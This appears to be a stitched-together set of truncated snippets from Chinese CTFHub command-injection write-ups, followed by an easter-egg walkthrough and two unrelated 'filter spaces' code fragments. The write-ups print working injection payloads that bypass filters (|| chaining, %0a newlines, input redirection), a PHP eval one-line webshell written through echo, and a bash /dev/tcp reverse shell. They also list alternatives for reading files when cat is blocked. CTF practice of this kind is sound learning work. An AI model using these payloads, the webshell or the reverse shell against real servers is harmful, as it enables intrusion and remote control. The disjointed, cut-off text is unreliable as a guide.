打开靶机 查看页面信息 开始尝试注入 127.0.0.1 || ls 尝试绕过 127.0.0.1||ls 使用cat命令查看flag 127.0.0.11||cat<flag_10872536812766.php 拿到flag 绕过空格过滤方法很多,详情请自行百度搜索…

过滤目录分隔符 打开靶机 查看页面信息 查询当前目录下文件结构 进入flag_is_here目录 127.0.0.1;cd flag_is_here 127.0.0.1||ls 执行之后发现还是在当前目录 使用如下命令进行查询 127.0.0.1;cd flag_is_here;ls 查看文件信息 127.0.0.1;cd flag_is_here;cat flag_1633660217512.php 成功拿到flag 过滤运算符 查看文件结构 ;ls 查看文件信息 ;cat flag_4603…

打开靶机 查看页面信息 构造payload 127.0.0.1 || ls 题目提示过滤了cat,但我还是想试试 果然不行 网页访问没有结果,应该和上题一样被注释了,使用和同样的方法进行解题 利用命令执行写入一句话木马 127.0.0.1 &echo "<?php @eval(\$_POST['a']);?>" >> shell.php 成功拿到flag…

打开靶机 查看页面信息 查看源码可以发现这一次过滤了很多东西,查看当前目录信息 查询到%0a为换行符,可以利用这个url编码进行命令注入,开始尝试 http://challenge-2a4584dabb18d320.sandbox.ctfhub.com:10080/?ip=127.0.0.1%0als# 查看flag_is_here文件夹内文件信息 challenge-2a4584dabb18d320.sandbox.ctfhub.com:10080/?ip=127.0.0.1%0Als<fla…

打开靶机 查看页面信息 输入127.0.0.1进行测试 构造payload 127.0.0.1&ls 查看文件内容信息 127.0.0.1 & cat 179852221619745.php 没有反应...... 利用命令执行写入一句话木马 127.0.0.1 &echo "<?php @eval(\$_POST['a']);?>" >> shell.php 成功拿到flag…

命令注入 源码直接给了出来尝试127.0.0.1;ls 发现一串数字的php文件cat查看 127.0.0.1|cat 233382768628619.php 查看源码发现flag 过滤cat 这题和上一题差不多只不过把cat给过滤掉了,过滤了cat我们可以用一下几种方法绕过 tac 从最后一行倒序显示内容,并将所有内容输出 more 根据窗口大小,一页一页的现实文件内容 less 和more类似,但其优点可以往前翻页,而且进行可以搜索字符 head 只显示头几行 tail 只显示最后几行 nl…

一个简单的ping,还没有过滤,源码也给出来了 ls一下 127.0.0.1 & ls 有一个可疑的php文件,,,但是直接访问和 cat 都出不来... 试了几下反弹shell,没成功...于是直接用echo了一个一句话进去 .php 注意这里$转义了一下,不转的话会被识别成变量.. 之后拿我40米长的菜刀 php用了注释..和想的差不多 这题竟然花了那么久 我是这样反弹shell.. bash -i >& /dev/tcp/ip/port 过滤空格的 127.0.0.1&…

彩蛋题建议大家首先自己动手去找一找 做 好 准 备 后 再 看 下 文 !           1.首页 使用域名查询工具查询子域名 2.公众号 此题关注ctfhub公众号即可拿到,不过多赘述. 3.题目入口 随便开启一个题目,抓包 在url中间添加换行或空格,再放包,即可拿到flag 4.Writeup 在Writeup里搜索egg即可拿到flag 5.工具 在工具里搜索egg,即可拿到flag flag就在链接里 6.赛事 一个套路 7.真题 8.投稿提交 这道题比较有意思,flag分别在不…

Ext过滤空格 重写了组件... Ext.apply(Ext.form.TextField.prototype, { validator : function(text) { if (this.allowBlank == false && Ext.util.Format.trim(text).length == 0) return false; else return true; } });…

点击查看效果 点击进入下载 <html> <head> <title> 过滤空格 </title> <SCRIPT LANGUAGE="JavaScript"> var i = 0; document.onmousedown = function(event) { if (i == 1) { window.open('http://www.njxblog.com'); } //setTimeout(function (){wi…